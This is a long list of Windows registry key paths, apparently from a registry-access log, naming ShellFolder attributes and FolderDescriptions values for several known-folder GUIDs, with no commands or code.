HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{59031A47-3F72-44A7-89C5-5595FE6B30EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\Roamable
